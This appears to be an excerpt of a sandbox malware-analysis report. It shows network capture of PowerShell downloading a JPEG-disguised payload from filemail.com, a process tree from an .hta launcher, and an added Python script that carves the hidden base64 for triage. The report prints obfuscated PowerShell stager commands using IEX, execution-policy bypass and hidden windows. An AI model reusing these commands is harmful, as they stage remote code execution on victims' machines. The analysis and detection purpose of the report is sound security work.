                                                                            Content-Type: text/plain
                                                                            Data Ascii: QPAAEAwAUAcAAAA/QxPK8DA+YvPs7j4+gtPO7Dx+orPw6jp+wpPS6Di+4nP05ja+AmPW5DT+IkP44jL+QiPa4DE+YQP83j89gePe3D19ocPA3jt9waPi2Dm94YPE2Dc9YWPc1jU9gUP80TM9cSPd0zE9kAP/zT98sOPhzT18oMPAzjt8wKPiyzh8QGPBxjJ8swOwvj57w9OSvDy747O0ujq7A6OWuDj7I4O4tjb7U2O+sjN78hO
                                                                            Nov 26, 2024 09:44:46.520267010 CET1236INData Raw: 53 6a 6c 30 51 49 4e 63 4d 6a 75 7a 45 67 4d 35 4c 7a 36 79 6f 74 4d 4e 4c 6a 77 79 49 6f 4d 74 4a 54 57 79 30 6b 4d 45 45 44 78 78 45 62 4d 50 47 54 61 78 59 45 4d 39 44 44 2b 77 49 50 4d 74 44 6a 53 41 41 41 41 59 43 41 42 67 44 77 50 2f 2f 44
                                                                            Data Ascii: Sjl0QINcMjuzEgM5Lz6yotMNLjwyIoMtJTWy0kMEEDxxEbMPGTaxYEM9DD+wIPMtDjSAAAAYCABgDwP//D2/Q6PS4z/+ksPS6TX+QlPG5TM+EQPq3z39scPA3zu9oZPttzW7A0OIoDs6AqOWqTi68nOwpjV68kOIpTQ64QO5nD95MeOZnzu58ZONmze5wGOyfT63I8NXdDM2s4MCPzozUjMaLTex0aMgGDmxsGM1AAAAwHAEANA
                                                                            Nov 26, 2024 09:44:46.520303965 CET1236INData Raw: 51 64 4f 47 6e 44 70 35 38 5a 4f 61 6d 6a 68 35 73 58 4f 6d 6c 54 57 35 34 55 4f 66 6b 54 41 34 77 50 4f 33 6a 44 37 34 41 4e 4f 73 69 54 65 34 51 48 4f 76 68 44 5a 34 4d 44 4f 50 67 6a 43 34 55 77 4e 36 66 6a 33 33 63 38 4e 73 65 7a 70 33 49 36
                                                                            Data Ascii: QdOGnDp58ZOamjh5sXOmlTW54UOfkTA4wPO3jD74ANOsiTe4QHOvhDZ4MDOPgjC4UwN6fj33c8Nsezp3I6NXeze3s2NKdTR3A0N1czE3EgNjbj32ktNObjs20pNzZjb2kmNeZjQ2gjNdYDG2MhNIUD71cdNzWjr1kaNeWjg14VNxUDL1cSNcUDA0YPNYTz004MNDTzp00JNCSTf0gHNtRTU0cENsQzJ0ICNXMz+zE/MWPT0zw8M
                                                                            Nov 26, 2024 09:44:46.520315886 CET1236INData Raw: 55 44 43 7a 63 50 41 41 41 41 52 41 51 41 45 41 41 41 41 34 4d 65 4e 56 57 44 65 31 59 43 4e 41 50 44 71 79 73 75 4d 79 4b 44 6a 79 41 56 4d 7a 42 54 67 77 41 46 41 41 41 41 4a 41 51 41 41 41 38 6a 73 2f 30 32 50 36 34 44 36 2b 73 72 50 4f 32 44
                                                                            Data Ascii: UDCzcPAAAARAQAEAAAA4MeNVWDe1YCNAPDqysuMyKDjyAVMzBTgwAFAAAAJAQAAA8js/02P64D6+srPO2D39cCP3vjp781OEoj9447NybTXzk8M5MzEyYvMEEjHAAAA0AwAwDgPz4DF9cfP22Tl9EXPq1TZ8UPP5sja6YrOxqjk5YZO1lTU5oUOFhD23E/NBTTZ0sFAAAAOAMA4AAAA9cfPQxDI7o/OdvzJ7sgOyqDm0k1M2PDp
                                                                            Nov 26, 2024 09:44:46.520328999 CET1236INData Raw: 67 4e 4d 53 44 44 78 77 38 4c 4d 35 43 7a 73 77 30 4b 4d 6f 43 6a 6f 77 77 4a 4d 57 43 54 6b 77 73 49 4d 46 43 7a 66 77 6f 48 4d 30 42 6a 62 77 67 47 4d 6a 42 54 58 77 63 46 4d 52 42 44 54 77 59 45 4d 41 42 6a 4f 77 55 44 4d 76 41 54 4b 77 4d 43
                                                                            Data Ascii: gNMSDDxw8LM5Czsw0KMoCjowwJMWCTkwsIMFCzfwoHM0BjbwgGMjBTXwcFMRBDTwYEMABjOwUDMvATKwMCMeADGwIBMMAzBwEAAAAA1AMAUAAAA/s/P1/D8/o+Pk/j3/k9PT/Tz/c8PC/Dv/Y7Pw+zq/U6Pf+Tm/Q5PO+Di/I4P99zd/E3Pr9jZ/A2Pa9DV/80PJ9zQ/0zP48jM/wyPm8TI/sxPV8zD/owPE4j/+gvPz7T7+cuP
                                                                            Nov 26, 2024 09:44:46.641349077 CET1236INData Raw: 69 6a 66 41 41 41 41 73 41 77 41 67 41 77 50 45 2f 7a 72 2f 6f 35 50 2f 51 6a 68 30 41 45 41 41 41 41 46 41 4d 41 45 41 4d 54 30 7a 51 4d 41 41 41 41 44 41 4d 41 41 41 38 54 39 2f 38 39 50 4a 2f 7a 6d 41 41 41 41 51 41 67 41 77 44 41 41 41 49 7a
                                                                            Data Ascii: ijfAAAAsAwAgAwPE/zr/o5P/Qjh0AEAAAAFAMAEAMT0zQMAAAADAMAAA8T9/89PJ/zmAAAAQAgAwDAAAIzAxQfMjHTxxYLAAAAFAIA4AAAA5IUOhkzD5AAOaDAAAQBACAMA1wAN+Tz70UOAAAAEAIAsAwjS84DPgsz+7Q+ODCAAAQBACAKAAAAOdhzU4MxNKYz+2AvNlbj220sN5aTqAAAAgAgAACgP45Dd+AnPs5Da+QmPg5DX


                                                                            Session ID | Source IP   | Source Port | Destination IP | Destination Port | PID  | Process
                                                                            0          | 192.168.2.4 | 49731       | 193.30.119.205 | 443              | 8032 | C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
                                                                            Timestamp               | Bytes transferred | Direction | Data
                                                                            2024-11-26 08:44:25 UTC | 211               | OUT       | GET /api/file/get?filekey=shTPHbCPX8o-lOtCqHLG6_0xCy-xl4tnxlAVbQ95-dviTK5cARaNdQjbb3mexfwQzKmTXg&skipreg=true&pk_vid=e0109638c9bfb9571732531309b5ff7c HTTP/1.1
                                                                                                    |                   |           | Host: 3105.filemail.com
                                                                                                    |                   |           | Connection: Keep-Alive
                                                                            2024-11-26 08:44:26 UTC | 328               | IN        | HTTP/1.1 200 OK
                                                                                                    |                   |           | Content-Length: 2230233
                                                                                                    |                   |           | Content-Type: image/jpeg
                                                                                                    |                   |           | Last-Modified: Mon, 25 Nov 2024 10:41:01 GMT
                                                                                                    |                   |           | Accept-Ranges: bytes
                                                                                                    |                   |           | ETag: 67ad55be8fbd7389b2f5ef2b123a44b4
                                                                                                    |                   |           | X-Transfer-ID: ibybhsntnwgamsn
                                                                                                    |                   |           | Content-Disposition: attachment; filename=new_imagem-vbs.jpg
                                                                                                    |                   |           | Date: Tue, 26 Nov 2024 08:44:24 GMT
                                                                                                    |                   |           | Connection: close
                                                                            2024-11-26 08:44:26 UTC2788INData Raw: ff d8 ff e0 00 10 4a 46 49 46 00 01 01 00 00 01 00 01 00 00 ff db 00 43 00 08 06 06 07 06 05 08 07 07 07 09 09 08 0a 0c 14 0d 0c 0b 0b 0c 19 12 13 0f 14 1d 1a 1f 1e 1d 1a 1c 1c 20 24 2e 27 20 22 2c 23 1c 1c 28 37 29 2c 30 31 34 34 34 1f 27 39 3d 38 32 3c 2e 33 34 32 ff db 00 43 01 09 09 09 0c 0b 0c 18 0d 0d 18 32 21 1c 21 32 32 32 32 32 32 32 32 32 32 32 32 32 32 32 32 32 32 32 32 32 32 32 32 32 32 32 32 32 32 32 32 32 32 32 32 32 32 32 32 32 32 32 32 32 32 32 32 32 32 ff c0 00 11 08 04 38 07 80 03 01 22 00 02 11 01 03 11 01 ff c4 00 1c 00 00 02 03 01 01 01 01 00 00 00 00 00 00 00 00 00 03 04 01 02 05 00 06 07 08 ff c4 00 55 10 00 02 02 01 03 02 04 03 05 06 03 05 06 02 01 15 01 02 03 11 00 04 12 21 31 41 05 13 22 51 61 71 81 06 14 32 91 a1 07 23 42 b1 c1
                                                                            Data Ascii: JFIFC $.' ",#(7),01444'9=82<.342C2!!222222222222222222222222222222222222222222222222228"U!1A"Qaq2#B
                                                                            2024-11-26 08:44:26 UTC8192INData Raw: 7c 20 f1 02 0b 6d 76 25 85 73 99 62 5f 34 d8 1c 7b e1 83 10 a3 8a b3 d7 01 8d 66 a0 49 0c 6a 5b 68 dc c7 75 e1 74 7a 92 cc 1f 71 de be 96 e6 f7 0f 7c c8 f1 3d 3b 6a 61 8e 38 e5 68 88 53 ea 51 cd e4 69 8b 69 b6 02 ec e5 68 59 ea 78 eb 81 ea 25 9c b2 90 2b 69 19 91 39 68 a6 8e 4d 96 a1 83 30 63 c6 30 9a 85 d8 ac 59 55 5b 81 67 92 71 2f 14 95 e6 85 a2 86 89 65 2a 6b b5 e0 6a 45 e2 ed 26 a4 45 1f aa 31 d4 a9 e0 1f 6c cd 97 c4 4b c9 2b 9e 77 31 20 fd 71 4d 32 2f 84 e8 00 6d cc e7 80 7b 9f 8e 27 14 ca fc 0f c3 cf 24 60 3a 67 91 e4 34 0b 1a be b9 07 54 77 8b e0 11 ef df 04 93 a2 2b 51 f5 1e 2b e1 99 7a 9d 2e ac 78 92 ce 35 2d f7 72 2b cb a1 5f 3c 0d 4d 46 b0 24 43 7b 80 01 ea 73 28 78 e4 72 6a 44 11 48 b2 b3 70 42 9e 83 16 f1 5d 24 be 21 a6 68 23 72 9b bd 25 be
                                                                            Data Ascii: | mv%sb_4{fIj[hutzq|=;ja8hSQiihYx%+i9hM0c0YU[gq/e*kjE&E1lK+w1 qM2/m{'$`:g4Tw+Q+z.x5-r+_<MF$C{s(xrjDHpB]$!h#r%
                                                                            2024-11-26 08:44:26 UTC8192INData Raw: 9e 20 ec ab 21 3c 05 3d 6f 34 e6 73 24 2c e4 92 ab db fb 66 59 0c ec 14 0f c4 7a 11 81 0f 13 2c 81 ca 90 80 8e 71 e5 2a 74 e1 e3 2a 55 78 17 d8 df cf 2b 2c 4e 80 47 2a b5 05 dd 83 d3 29 55 65 55 65 1b 88 c0 d0 66 49 22 dc ae c1 81 be 17 8e 98 b8 77 8c 15 90 2d 6e ea 32 88 5e 32 40 1b ab 2a 25 32 69 64 0c c3 75 1f cc 74 c0 b4 00 44 43 48 3d 24 9e be d9 57 87 73 82 09 b3 d6 b1 53 aa 77 34 e4 5d 03 47 e5 93 f7 c4 14 49 da 40 2a 7e 3f 96 07 ad 79 e3 61 bd 4e d0 7b e4 95 8a 45 b0 c5 8f c3 02 ba 33 cb 53 00 3b 9c 80 42 b1 3b b9 f9 60 18 ce aa 42 b2 86 1d 2c 76 f9 e3 0e ab 40 03 c5 70 31 00 f6 a4 48 6a fa 1d b8 cc 2f e7 00 a5 a9 94 58 f8 8c 0e 24 5d 61 13 77 6b 03 e1 92 17 af 1f 8b 8b c9 29 b5 49 1f 2c 00 18 b9 2d 6c 4f c7 28 47 15 75 86 08 42 f2 6b 2a c9 e9 3e
                                                                            Data Ascii: !<=o4s$,fYz,q*t*Ux+,NG*)UeUefI"w-n2^2@*%2idutDCH=$WsSw4]GI@*~?yaN{E3S;B;`B,v@p1Hj/X$]awk)I,-lO(GuBk*>
                                                                            2024-11-26 08:44:26 UTC8192INData Raw: ed 05 94 82 03 74 e9 c7 e8 70 f2 cd 16 a7 5a 65 2a 17 74 8a 6b b0 1d fb fb e0 7a 1f b4 10 40 82 08 b4 cc 3c 94 8a 67 ab be 42 80 3f 9e 6b e8 1a 11 e1 5a 15 24 16 30 21 20 7f ba 33 c6 6b 34 eb a7 90 36 9e 63 22 b2 b0 03 b0 5a e7 9e 9e ff 00 96 7a 1f 0b d6 14 f0 b8 09 82 d9 54 2a 9a ea 28 60 6b 96 8e 36 f3 18 0d a0 d6 18 79 6e a0 95 e0 f4 23 32 c4 87 56 a6 3a a2 79 2b d0 8c 6a 13 2a 44 b1 9e 4a fb e0 5e 7d 8a a6 f6 91 fa e5 7c f0 cb b4 05 34 3d b2 b2 44 f2 2b 58 17 7f 2c 18 d3 b9 db 5c 10 68 f3 db 02 00 21 0a 03 c9 ef 58 1f 25 5d 8a be d6 db ce de f8 77 66 81 cf 98 85 80 1c 37 b6 20 64 47 d4 17 04 82 45 60 3b 2c 48 48 07 6d 11 c0 1d b0 d0 a2 e9 d0 24 67 8e a4 62 b1 6a 36 30 0e 9b bb 59 ca c9 29 56 2c ad c9 e8 30 0c 1d 9a 6a 0e a2 8d 73 91 3f 98 ac a4 b2 d0
                                                                            Data Ascii: tpZe*tkz@<gB?kZ$0! 3k46c"ZzT*(`k6yn#2V:y+j*DJ^}|4=D+X,\h!X%]wf7 dGE`;,HHm$gbj60Y)V,0js?
                                                                            2024-11-26 08:44:26 UTC8192INData Raw: 4f 2d e8 58 f8 e4 b8 06 24 e0 ee ef ce 06 8f 2c 9d 16 bd f2 84 85 42 a3 6d 9e b8 81 86 40 a0 ed 34 7b de 0e a8 f7 bc 07 80 65 23 90 45 70 0e 11 5c 1b 24 a7 3d 47 b6 26 64 64 41 c7 3f 1c 1a a9 72 4d d6 01 67 27 79 3c 00 3a 56 01 89 6e a7 38 93 c8 eb 9c 4e 07 2d 82 48 1d 32 db 99 ba 91 7d b2 36 d2 d8 3c e5 7b f3 81 72 18 02 4d 50 f8 e5 4f 39 07 a9 ac 8a c0 b8 52 5a 85 5f c4 e1 00 78 c5 82 6b da f8 c1 90 36 83 df 38 b1 6a ae 30 08 ec fb 81 b3 64 58 cb 96 2f 05 13 6d 76 70 5b dd 58 31 22 ea a8 e1 22 6d e7 6e d0 2b 92 7d f0 02 a7 69 e4 73 d4 5e 10 4b c1 6a 17 5c e5 a5 a9 24 b6 1b 68 55 62 e4 51 c0 e3 c9 ce 07 90 7d b2 2b 3a b0 2e ee 59 89 39 4a ce ac ea c0 ea c2 a3 aa ad 15 04 fc 70 55 92 05 91 ce 07 a1 d0 ea 74 e9 a6 8c 81 44 9f 50 f8 e0 b5 9a 89 16 70 a0 1f
                                                                            Data Ascii: O-X$,Bm@4{e#Ep\$=G&ddA?rMg'y<:Vn8N-H2}6<{rMPO9RZ_xk68j0dX/mvp[X1""mn+}is^Kj\$hUbQ}+:.Y9JpUtDPp
                                                                            2024-11-26 08:44:26 UTC8192INData Raw: f9 60 66 97 79 58 09 1c 6d 5e a3 bd 67 d2 3f 64 fa ad 4e 8f c6 3c 5a 6f 0f 81 26 d5 ae 89 76 2b 92 14 a9 96 20 d6 47 b0 24 fd 33 e6 e1 1c 0e 97 f0 cf 65 fb 3e 32 47 37 8d bc 48 4c 8b e1 ea 54 02 07 ff 00 b4 43 ef 80 df 85 06 1f b4 ef 14 31 85 65 bf 12 21 41 2c 08 f2 a6 a1 67 17 fb 7a 61 4d 47 82 94 85 d2 56 f0 7d 1b 02 64 3b 4a 84 65 aa 22 ec 80 bd 0f e7 d7 34 b4 48 cd fb 5f f1 84 55 db 73 f8 90 1b 6b bc 53 0e b9 9b f6 db 4e d2 cb e0 b2 88 a4 47 93 c1 74 81 8b 1b 04 84 ad c3 f2 c0 f5 7f b7 54 77 f1 af 0a 70 c5 b7 69 99 41 1d 0b 06 36 2f e1 9f 37 d1 6b a7 89 02 49 08 05 46 d1 ea eb fe ab 3e 91 fb 5d d2 49 a5 f1 1f b3 f0 31 56 11 69 5d 76 a8 da 4b 06 5d cd ff 00 17 1f 96 7c dd 11 9f 50 bb 49 da 09 1c 0b be 7d f0 1e 7d 4c 8c 9b 8a 00 ac 38 b6 e3 f9 62 6f 23
                                                                            Data Ascii: `fyXm^g?dN<Zo&v+ G$3e>2G7HLTC1e!A,gzaMGV}d;Je"4H_UskSNGtTwpiA6/7kIF>]I1Vi]vK]|PI}}L8bo#
                                                                            2024-11-26 08:44:26 UTC8192INData Raw: db d4 f8 32 aa 7f d9 a4 97 4d 10 21 8c 7a 7d b1 ee 20 df 50 b7 cd 76 39 9f a8 fb 3b a3 d4 3c 6b 36 a7 c4 26 91 97 61 2d 2a b7 96 28 9e 4b 2d f7 02 87 be 23 ff 00 c6 cf 28 0c ba df 0f 56 8c 33 6d 10 ca 37 70 69 4d ad fe 47 3c ff 00 87 f8 d6 a3 5f f6 87 ef b2 be 99 1d 15 99 04 81 fc b5 27 83 b4 2f 36 45 f5 c0 f5 9e 29 e0 11 ea 3c 2f 4d 2e 97 4f 2c d2 41 12 a4 71 82 22 66 5f 48 a6 2c bc 50 b3 5c 1e d8 de 93 ec 8f 85 2a 46 f3 69 8b 49 b1 43 a8 99 8a ab 00 6c f1 b7 ad fc b8 e8 30 3a 4f 1e d4 47 0c 47 c4 35 9a 28 24 75 56 f2 d7 4d 23 32 ab 0d c3 71 dd 57 4c 3a 63 bf fc 43 a3 db 29 6f 15 89 43 2f 58 f4 ce a7 ff 00 16 e1 d3 e0 70 0d a6 f0 1f 0a d2 bb 34 3a 18 99 8d 73 20 2f cf fc 44 9c be aa 57 d4 a3 04 d3 4e ea 19 54 b2 b9 8b 8d f4 d4 41 04 50 5d de cc 3a 5e 66
                                                                            Data Ascii: 2M!z} Pv9;<k6&a-*(K-#(V3m7piMG<_'/6E)</M.O,Aq"f_H,P\*FiICl0:OGG5($uVM#2qWL:cC)oC/Xp4:s /DWNTAP]:^f
                                                                            2024-11-26 08:44:26 UTC8192INData Raw: 8d c1 55 ba 8e bc e0 a4 d3 19 81 40 79 ed 58 6d 4c 51 79 eb 09 52 59 b9 b3 db 39 d9 20 84 c8 8e 16 48 d8 10 a7 a9 c0 a4 7a 39 1a 0d a6 42 8d d3 60 00 5d 77 38 b4 41 e0 9a 4a 76 37 e9 dc 3b e6 aa eb 23 75 90 95 06 46 5d c5 87 7b 1d 33 30 80 aa bd ec 13 5e f8 06 82 4f 2a 55 46 da 41 36 77 0e 4e 5b 5e ac da 80 e1 6d 5b b1 3d 31 78 2d e6 de 50 d0 15 64 e6 93 2e f4 50 79 f8 fb 60 66 24 76 f6 76 ad 1e 2f 1e f2 ca c6 18 a8 b2 0d 62 da 95 65 70 a1 36 95 3d 71 a2 ce da 51 34 6a 59 bf 0b 83 fc c6 02 64 b5 ae f2 b4 3d ba e7 15 0c 4b 0a af 8e 56 30 5d c9 0a b5 d3 e5 8d 04 55 4d a1 4b 37 7a 38 11 0c 8d a5 62 ec 54 10 0d 51 ba 3f 4c b8 95 66 8c cc 5f 93 f1 e8 71 32 83 d4 ce 83 71 24 d0 1f 2c 13 35 50 28 28 74 03 fa e0 3b 0c e5 4f a9 81 be a0 65 43 87 72 c4 f2 3a 62 65
                                                                            Data Ascii: U@yXmLQyRY9 Hz9B`]w8AJv7;#uF]{30^O*UFA6wN[^m[=1x-Pd.Py`f$vv/bep6=qQ4jYd=KV0]UMK7z8bTQ?Lf_q2q$,5P((t;OeCr:be
                                                                            2024-11-26 08:44:26 UTC8192INData Raw: 58 42 b3 85 56 12 28 ea c1 48 07 9f 8f 3f 9e 09 9d d0 90 c2 88 f8 7f 5c a2 02 e7 a8 06 89 b3 f0 e7 01 aa 56 31 90 c0 06 50 5e ff 00 84 dd 57 d7 af d7 28 8d b6 c2 dd 73 5e c7 05 0b 5b 10 f6 45 5e 31 1c 42 40 cc 17 6a a8 b1 80 2f 33 71 2b 44 91 ed 97 8b 4b b9 77 c8 48 27 b6 1a 2d 2a b3 07 66 fc 42 c6 41 5d 4c 6c 51 5a d7 f8 4f b6 04 cf 18 fb ab 79 62 c5 8b f7 cf 6d fb 2a 9a 05 d4 7d a1 89 9d 84 92 f8 26 a5 55 56 ef 8d a4 d5 77 a1 9e 17 cd 64 a8 ef 71 3c 1f 86 7b 2f d9 64 4b 2f db 73 a4 91 5c a6 af 47 a9 85 c2 7e 2a 31 b1 35 f1 e3 01 bd 4c cf 3f ed 9b c2 11 a5 57 92 1f 10 d0 23 37 a8 ee 65 58 54 9e 45 dd a9 bb cb 7e d3 67 31 3f 86 45 21 6d ca fe 24 4b 96 34 59 b5 73 0e 17 b7 41 84 f1 28 74 fa 2f db 84 1e 58 61 1f fb 4b 46 ea b4 4b 53 08 9b b9 eb ce 53 f6 ad
                                                                            Data Ascii: XBV(H?\V1P^W(s^[E^1B@j/3q+DKwH'-*fBA]LlQZOybm*}&UVwdq<{/dK/s\G~*15L?W#7eXTE~g1?E!m$K4YsA(t/XaKFKSS
                                                                            2024-11-26 08:44:26 UTC8192INData Raw: 69 0b 35 a2 f2 78 ba c0 8d 34 86 25 89 1e f7 2b 80 dc fe 2e 0e 46 a3 52 e3 53 14 32 29 a2 e4 ee 04 51 5f 62 32 1e 02 8e 1c d9 da 68 fc ab ae 0e 48 dd 98 39 e4 83 6a 70 07 aa 55 01 5c bb 29 5d ca 42 fb 1e 9c 62 31 07 2b 3b 31 62 a0 0d bd bf d7 6c d2 97 6c ff 00 c2 40 ba 6b ae b8 b8 78 d5 5a 31 4c b6 47 18 09 19 1e 39 37 97 6a 65 04 01 d0 1a ac 89 b5 01 64 52 8c 7d 3c b7 5e 4e 56 68 c8 1b 40 3b 57 a0 f6 18 30 87 70 20 12 ac 2d 8d 74 ac 03 cf 38 9e 42 ca 68 ad 5f c3 9c 58 94 52 d2 93 ea dd f9 e7 2a 95 2c bb b8 3e ae 45 5f b6 55 54 f9 db 40 52 18 6e f9 1c 07 74 ce 8a b3 9d 95 fb a0 59 8e 3f 04 81 e1 49 17 80 62 06 ab e3 d7 13 d3 30 d3 ca 1e 65 66 47 3b 69 45 83 9a b0 4f a3 6b 20 90 a0 d2 a9 1d 30 32 8c 46 45 42 e1 9d 45 dc 7d fa e6 8e 89 52 2f 0e 54 92 e2 dc
                                                                            Data Ascii: i5x4%+.FRS2)Q_b2hH9jpU\)]Bb1+;1bll@kxZ1LG97jedR}<^NVh@;W0p -t8Bh_XR*,>E_UT@RntY?Ib0efG;iEOk 02FEBE}R/T
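
The response in this session is served as image/jpeg, begins with a genuine JFIF header, and is delivered under the Content-Disposition name new_imagem-vbs.jpg. Its 2,230,233-byte body is what the later PowerShell stage (Target ID 9) decodes as UTF-8 text and searches for the literal markers <<BASE64_START>> and <<BASE64_END>>; the text between them is base64 written backwards, which the stage reverses, decodes and hands to [System.Reflection.Assembly]::Load. Only the first few kilobytes of the body are reproduced above, so the markers themselves are not visible in this excerpt. The Python below is an added example, not part of the report, that replays that carving step on a constructed JPEG-headed blob with a stand-in payload appended. The two marker strings are the ones from the command line; the JPEG header, filler, payload and function names are constructed for the example.

```python
import base64
from typing import Optional

# The two literal markers the stager's command line searches for in the
# downloaded bytes (copied from the report; everything else here is constructed).
START_MARKER = b"<<BASE64_START>>"
END_MARKER = b"<<BASE64_END>>"


def carve_reversed_base64(blob: bytes) -> Optional[bytes]:
    """Replicate the stager's extraction step on raw bytes.

    The stager decodes the whole download as UTF-8 text, locates the markers,
    takes the text between them, reverses it character by character and
    base64-decodes the result. Working on bytes instead of decoded text avoids
    the U+FFFD substitutions the JPEG body would produce, and gives the same
    answer because the markers and the base64 alphabet are pure ASCII.
    """
    start = blob.find(START_MARKER)
    if start < 0:
        return None
    start += len(START_MARKER)
    end = blob.find(END_MARKER, start)
    if end < 0:
        return None
    forward_b64 = blob[start:end][::-1]  # undo the reversal
    try:
        return base64.b64decode(forward_b64, validate=True)
    except ValueError:
        return None


def is_jpeg(blob: bytes) -> bool:
    """SOI marker followed by a marker byte: what a real JPEG begins with."""
    return blob[:3] == b"\xff\xd8\xff"


def looks_like_pe(blob: bytes) -> bool:
    """The stager passes the decoded bytes to Assembly.Load, so expect a PE."""
    return blob[:2] == b"MZ"


def triage_download(blob: bytes) -> dict:
    """Summarise what a defender wants to know about a captured response body."""
    carved = carve_reversed_base64(blob)
    return {
        "jpeg_header": is_jpeg(blob),
        "has_markers": START_MARKER in blob and END_MARKER in blob,
        "carved_length": None if carved is None else len(carved),
        "carved_is_pe": carved is not None and looks_like_pe(carved),
    }


def build_sample_polyglot(payload: bytes) -> bytes:
    """Constructed test input: a minimal JFIF header, filler standing in for
    image data, then the payload appended the way the stager expects."""
    jfif_head = b"\xff\xd8\xff\xe0\x00\x10JFIF\x00\x01\x01\x00\x00\x01\x00\x01\x00\x00"
    filler = bytes(range(256)) * 4
    reversed_b64 = base64.b64encode(payload)[::-1]
    return jfif_head + filler + START_MARKER + reversed_b64 + END_MARKER + b"\xff\xd9"


if __name__ == "__main__":
    # A stand-in "assembly": DOS header magic plus padding, not a real binary.
    fake_pe = b"MZ" + b"\x00" * 62 + b"PE\x00\x00"
    print(triage_download(build_sample_polyglot(fake_pe)))
```

Run against a saved response body, the same three signals (valid image header, both markers present, carved bytes starting with MZ) are what separates this download from an ordinary JPEG that merely has a misleading filename.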



                                                                            Target ID:0
                                                                            Start time:03:44:08
                                                                            Start date:26/11/2024
                                                                            Path:C:\Windows\SysWOW64\mshta.exe
                                                                            Wow64 process (32bit):true
                                                                            Commandline:mshta.exe "C:\Users\user\Desktop\sweetbabygivenbestthignsetnirelifegivenbackbestthignsalways.hta"
                                                                            Imagebase:0xbb0000
                                                                            File size:13'312 bytes
                                                                            MD5 hash:06B02D5C097C7DB1F109749C45F3F505
                                                                            Has elevated privileges:true
                                                                            Has administrator privileges:true
                                                                            Programmed in:C, C++ or other language
                                                                            Reputation:moderate
                                                                            Has exited:true

                                                                            Target ID:1
                                                                            Start time:03:44:09
                                                                            Start date:26/11/2024
                                                                            Path:C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
                                                                            Wow64 process (32bit):true
                                                                            Commandline:"C:\Windows\sysTEm32\WInDowSpoWeRShell\V1.0\POwersheLL.exE" "powErsHEll.eXE -EX BYpaSs -noP -W 1 -C dEViCEcReDEntIaLDEployMENt ; IeX($(iEX('[SYsTem.tExT.EnCoDINg]'+[ChAR]0x3a+[ChaR]0x3a+'utF8.GeTSTrING([SystEM.cOnvERt]'+[CHAR]0x3a+[cHAR]58+'FrOMbASe64STrING('+[CHAr]34+'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'+[cHaR]0x22+'))')))"
                                                                            Imagebase:0xc20000
                                                                            File size:433'152 bytes
                                                                            MD5 hash:C32CA4ACFCC635EC1EA6ED8A34DF5FAC
                                                                            Has elevated privileges:true
                                                                            Has administrator privileges:true
                                                                            Programmed in:C, C++ or other language
                                                                            Reputation:high
                                                                            Has exited:true

                                                                            Target ID:2
                                                                            Start time:03:44:09
                                                                            Start date:26/11/2024
                                                                            Path:C:\Windows\System32\conhost.exe
                                                                            Wow64 process (32bit):false
                                                                            Commandline:C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                                                                            Imagebase:0x7ff7699e0000
                                                                            File size:862'208 bytes
                                                                            MD5 hash:0D698AF330FD17BEE3BF90011D49251D
                                                                            Has elevated privileges:true
                                                                            Has administrator privileges:true
                                                                            Programmed in:C, C++ or other language
                                                                            Reputation:high
                                                                            Has exited:true

                                                                            Target ID:3
                                                                            Start time:03:44:10
                                                                            Start date:26/11/2024
                                                                            Path:C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
                                                                            Wow64 process (32bit):true
                                                                            Commandline:"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -EX BYpaSs -noP -W 1 -C dEViCEcReDEntIaLDEployMENt
                                                                            Imagebase:0xc20000
                                                                            File size:433'152 bytes
                                                                            MD5 hash:C32CA4ACFCC635EC1EA6ED8A34DF5FAC
                                                                            Has elevated privileges:true
                                                                            Has administrator privileges:true
                                                                            Programmed in:C, C++ or other language
                                                                            Reputation:high
                                                                            Has exited:true

                                                                            Target ID:4
                                                                            Start time:03:44:14
                                                                            Start date:26/11/2024
                                                                            Path:C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exe
                                                                            Wow64 process (32bit):true
                                                                            Commandline:"C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exe" /noconfig /fullpaths @"C:\Users\user\AppData\Local\Temp\blaytqul\blaytqul.cmdline"
                                                                            Imagebase:0xf00000
                                                                            File size:2'141'552 bytes
                                                                            MD5 hash:EB80BB1CA9B9C7F516FF69AFCFD75B7D
                                                                            Has elevated privileges:true
                                                                            Has administrator privileges:true
                                                                            Programmed in:C, C++ or other language
                                                                            Reputation:moderate
                                                                            Has exited:true

                                                                            Target ID:5
                                                                            Start time:03:44:15
                                                                            Start date:26/11/2024
                                                                            Path:C:\Windows\Microsoft.NET\Framework\v4.0.30319\cvtres.exe
                                                                            Wow64 process (32bit):true
                                                                            Commandline:C:\Windows\Microsoft.NET\Framework\v4.0.30319\cvtres.exe /NOLOGO /READONLY /MACHINE:IX86 "/OUT:C:\Users\user\AppData\Local\Temp\RESF818.tmp" "c:\Users\user\AppData\Local\Temp\blaytqul\CSC6824B6AE21FF4F1D9A4E95662E7FF991.TMP"
                                                                            Imagebase:0x420000
                                                                            File size:46'832 bytes
                                                                            MD5 hash:70D838A7DC5B359C3F938A71FAD77DB0
                                                                            Has elevated privileges:true
                                                                            Has administrator privileges:true
                                                                            Programmed in:C, C++ or other language
                                                                            Reputation:moderate
                                                                            Has exited:true

                                                                            Target ID:6
                                                                            Start time:03:44:21
                                                                            Start date:26/11/2024
                                                                            Path:C:\Windows\SysWOW64\wscript.exe
                                                                            Wow64 process (32bit):true
                                                                            Commandline:"C:\Windows\System32\WScript.exe" "C:\Users\user\AppData\Roaming\bestofthingswithentiretimegivenebstthignstodowithg.vBs"
                                                                            Imagebase:0xe30000
                                                                            File size:147'456 bytes
                                                                            MD5 hash:FF00E0480075B095948000BDC66E81F0
                                                                            Has elevated privileges:true
                                                                            Has administrator privileges:true
                                                                            Programmed in:C, C++ or other language
                                                                            Reputation:high
                                                                            Has exited:true

                                                                            Target ID:7
                                                                            Start time:03:44:21
                                                                            Start date:26/11/2024
                                                                            Path:C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
                                                                            Wow64 process (32bit):true
                                                                            Commandline:"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -command $Codigo = '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';$OWjuxd = [system.Text.encoding]::UTF8.GetString([system.Convert]::Frombase64String($codigo));powershell.exe -windowstyle hidden -executionpolicy bypass -NoProfile -command $OWjuxD
                                                                            Imagebase:0xc20000
                                                                            File size:433'152 bytes
